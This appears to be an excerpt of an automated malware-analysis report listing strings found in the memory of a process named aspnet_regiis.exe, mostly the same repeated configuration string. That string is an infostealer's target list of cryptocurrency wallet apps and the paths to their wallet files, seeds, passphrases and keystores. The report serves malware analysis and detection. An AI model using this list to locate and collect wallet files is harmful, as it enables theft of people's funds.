Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local 